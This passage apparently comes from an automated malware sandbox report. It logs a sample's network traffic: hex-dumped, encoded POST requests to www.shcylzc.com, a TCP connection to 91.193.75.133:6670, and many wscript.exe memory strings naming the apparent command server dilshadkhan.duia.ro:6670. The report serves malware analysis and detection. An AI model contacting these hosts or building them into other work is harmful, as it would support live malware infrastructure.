6e 6c 4d 4b 62 39 6d 58 61 66 72 52 68 50 69 50 46 6a 4b 36 61 6e 5a 37 6a 66 33 65 66 62 56 57 76 50 75 32 6d 31 38 34 6f 67 42 45 42 72 4c 36 30 70 62 51 69 6a 58 66 73 44 70 47 51 52 33 67 77 41 6f 51 4c 28 42 61 59 42 53 65 41 63 67 41 6f 33 75 36 6e 46 52 7e 6e 6b 4c 56 54 31 37 76 38 6b 4b 45 4d 34 77 39 54 35 4c 68 42 67 79 44 58 43 6d 36 66 49 72 44 64 31 7a 71 7a 68 61 41 31 39 52 78 54 62 41 54 5f 52 62 4d 53 51 5f 49 36 6a 77 70 6c 56 57 39 76 70 75 49 69 72 36 74 37 56 4a 59 74 72 2d 37 56 50 68 4c 35 31 52 5a 71 38 62 28 4e 5a 44 68 52 71 6e 54 52 4e 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
U48h=578CA7doqswB0eXxIAq3lMVxVqvN0TLY3me7z6B4mFJLh4P-JhEn75~2ZujHg8aKcYg2D7UAWZtp1yVSehbTGqF6jcly7rf3xjEY3Qq0eaIY1hCqdOg_bRq2cTAOLcXfjypVhE3kjquQBr69iVONfIi5Fpi3Pe7zH4S233wHM-xUrGL-rHEtwCSJVgbVb_YBteWPD7mFOJsoOdlvXh1nlMKb9mXafrRhPiPFjK6anZ7jf3efbVWvPu2m184ogBEBrL60pbQijXfsDpGQR3gwAoQL(BaYBSeAcgAo3u6nFR~nkLVT17v8kKEM4w9T5LhBgyDXCm6fIrDd1zqzhaA19RxTbAT_RbMSQ_I6jwplVW9vpuIir6t7VJYtr-7VPhL51RZq8b(NZDhRqnTRNQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 35 37 38 43 41 36 4d 72 31 73 55 45 33 4f 61 68 62 69 71 6a 74 64 6c 33 54 4b 72 43 37 7a 6e 4c 67 48 4f 33 39 62 77 65 6e 45 77 4d 6b 49 53 59 4e 69 30 76 37 39 32 50 44 73 33 44 6e 63 57 56 63 5a 49 49 44 37 41 41 58 61 38 30 79 52 64 72 5a 48 76 51 42 4b 45 66 67 63 6c 76 77 4a 72 65 78 6a 42 5f 33 51 69 43 64 70 73 59 6e 33 47 71 62 4e 59 6c 46 42 71 77 64 54 51 43 50 63 71 67 6a 78 59 4b 68 42 50 6b 6a 61 79 51 41 49 53 36 70 30 4f 53 62 59 6a 7a 41 70 69 75 61 4f 28 42 48 34 6e 56 33 32 4d 48 4d 4c 68 55 71 53 37 2d 28 6b 63 75 6f 69 53 41 52 67 62 53 52 66 56 48 74 64 6a 64 44 2d 47 37 4e 38 73 6f 50 74 6c 71 64 51 77 61 79 76 54 62 28 6d 6a 74 66 72 74 45 4f 7a 6a 64 6a 49 50 4c 77 36 79 62 51 31 32 35 62 58 37 79 4a 4f 32 69 39 63 34 76 67 42 45 48 72 4c 37 58 70 62 41 69 6a 55 28 73 44 4e 75 51 59 7a 38 7a 4c 6f 51 4f 77 68 61 36 63 43 53 4b 63 68 70 76 33 75 43 4a 51 77 71 6e 6c 71 6c 54 79 4b 75 71 72 71 45 56 38 77 39 61 33 72 68 34 67 79 44 68 43 6e 36 50 49 34 33 64 7a 69 71 7a 6d 38 38 31 6d 42 78 54 51 67 54 39 4b 4c 42 4b 51 2d 73 2d 6a 31 74 66 57 68 46 76 75 39 77 69 72 62 74 37 55 5a 59 74 7e 75 36 41 48 43 6a 38 35 52 59 66 35 4b 54 70 53 6d 41 47 67 6c 4b 49 58 50 72 34 46 6b 42 48 4f 4c 44 6e 4e 73 49 66 51 55 35 52 44 4d 6a 61 28 50 72 47 51 33 6c 43 34 42 69 39 42 50 78 41 33 39 62 43 6b 51 49 4a 42 74 4f 52 55 41 31 75 68 74 6a 78 6d 35 52 65 46 55 7e 67 42 6f 4e 6f 44 65 6b 79 78 6f 7e 35 32 68 42 6f 70 33 62 6b 57 5a 63 34 4d 64 50 65 62 50 4f 6e 72 47 43 56 78 61 6b 47 6f 51 32 6e 79 5a 48 49 53 65 39 4e 53 
4b 7e 6f 67 31 44 57 6b 33 34 76 58 43 74 6d 6b 5a 53 7a 33 6b 73 75 55 72 31 66 76 47 69 78 37 50 4f 43 65 34 70 63 52 72 6c 4d 75 32 4e 73 38 57 5a 44 4c 4a 5a 30 39 79 34 74 74 67 4a 5f 69 4e 54 6b 55 38 4e 34 6d 31 75 4e 54 48 59 68 66 30 36 4d 76 4d 48 33 49 36 44 36 72 48 42 39 6a 4d 76 48 78 7a 64 4d 74 35 6d 79 78 37 68 43 55 74 64 50 55 38 52 4e 47 78 73 44 75 45 41 70 51 50 77 72 75 48 41 31 70 76 58 66 4d 36 65 4d 42 79 45 49 64 42 42 64 73 47 4e 6d 76 63 4f 45 45 71 56 49 6e 57 68 6e 63 4c 31 53 67 72 70 68 69 6f 28 34 45 33 54 55 41 52 69 30 64 6d 75 4c 78 74 4b 55 70 61 4b 5f 38 4c 4f 6a 73 30 50 75 45 74 43 50 6d 4d 6a 66 49 31 34 33 33 73 39 52 33 50 58 33 63 30 78 59 43 36 78 68 63 44 45 6b 6d 41 6c 34 38 4e 7e 46 5a 2d 66 69 76 77 64 4c 62 73 50 2d 38 61 48 4a 65 6c 52 44 46 37 38 56 77 41 55 79 41 30 76 4f 51 74 39 56 34 4f 42 6e 75 71 28 42 75 4c 33 37 6f 65 33 64 72 34 39 61 70 67 4f 4c 6b 72 44 45 76 4d 46 4f 58 42 59 71 66 33 69 38 43 50 51 49 44 49 78 50 6a 42 54 62 6e 41 78 4c 36 4f
Source: global traffic TCP traffic: 192.168.2.3:49726 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 596date: Fri, 27 May 2022 16:47:16 GMTserver: LiteSpeedvary: User-Agent,User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 38 73 2f 3f 55 34 38 68 3d 64 2f 6e 73 74 45 66 4a 6a 36 45 71 48 49 61 6f 36 33 46 4a 30 73 39 47 75 71 41 39 35 4b 51 48 6f 71 74 61 6b 74 6a 72 39 2f 70 32 6a 48 77 6c 6b 43 51 33 79 68 43 45 6f 32 79 45 6b 7a 41 63 6e 43 77 69 26 61 6d 70 3b 6d 38 38 68 53 3d 36 6c 64 38 69 32 42 68 53 52 32 70 76 48 77 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6a 6c 62 77 61 74 65 72 64 61 6d 61 67 65 72 65 70 61 69 72 73 65 61 74 74 6c 65 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 
0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&amp;m88hS=6ld8i2BhSR2pvHw was not found on this server.<HR><I>www.jlbwaterdamagerepairseattle.com</I></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:47:32 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 May 2022 16:47:37 GMTContent-Type: text/htmlContent-Length: 291ETag: "628d16df-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:47:52 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:48:20 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Fri, 27 May 2022 16:48:37 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:49:37 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:49:39 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:49:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:49:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:49:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:50:15 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:50:18 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 May 2022 16:50:20 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Fri, 27 May 2022 16:50:27 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: wscript.exe, 00000001.00000002.830179135.000001922AD6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6
Source: wscript.exe, 0000000F.00000002.812070527.000001D194C8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.801022285.00000060A61E2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.811908702.000001D1932BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 0000000F.00000003.488153509.000001D195845000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.811908702.000001D1932BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813598655.000001D195883000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.805316166.000001D193220000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813530801.000001D195855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.789130459.000001D195886000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.631861222.000001D195879000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.488218904.000001D19584E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.785348224.000001D19585A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 0000000D.00000002.833414206.0000013D91828000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.808179818.0000013D8F3D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-
Source: wscript.exe, 0000000A.00000002.831598463.00000216E0843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-0
Source: wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((O
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((o
Source: wscript.exe, 00000001.00000003.548832551.000001922CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723341261.000001922CD95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.548963430.000001922CD45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.830621211.000001922CCE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723276252.000001922CD8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723406445.000001922CD8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723721357.000001922CD98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723080195.000001922CD6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.549020928.000001922CD60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0
Source: wscript.exe, 0000000A.00000003.607484404.00000216E083B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607801678.00000216E0843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6
Source: wscript.exe, 0000000F.00000002.813488182.000001D195830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre088214C05064EeSI
Source: wscript.exe, 0000000F.00000003.784432327.000001D19585E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0n
Source: wscript.exe, 0000000F.00000003.785149564.000001D195845000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.785408802.000001D195848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1dG
Source: wscript.exe, 0000000D.00000003.632311983.0000013D8F4B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1v
Source: wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre5
Source: wscript.exe, 0000000F.00000003.785408802.000001D195848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
Source: wscript.exe, 00000001.00000003.723636243.000001922CD45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre8
Source: wscript.exe, 0000000F.00000002.805316166.000001D193220000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre;
Source: wscript.exe, 0000000D.00000003.789581563.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818642353.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre=
Source: wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreC
Source: wscript.exe, 0000000D.00000003.631428377.0000013D91838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreC:HOMEPATH=
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQppZiAo
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQpyZXR1
Source: wscript.exe, 0000000D.00000003.632311983.0000013D8F4B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreIFIER=Intel64
Source: wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrO
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrro
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759702647.00000216DE0CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760032605.00000216DE0E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812626213.0000013D8F4A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.785308898.0000013D8F49D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.784860843.0000013D8F496000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789816311.0000013D8F4A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789955238.0000013D8F4B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789175287.0000013D8F49E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818642353.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.631938805.000001D1932EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 0000000D.00000003.631428377.0000013D91838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreO
Source: wscript.exe, 0000000F.00000003.488309896.000001D19582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreOI
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePro
Source: wscript.exe, 0000000A.00000002.807825968.00000216DE018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreVE
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrrE4
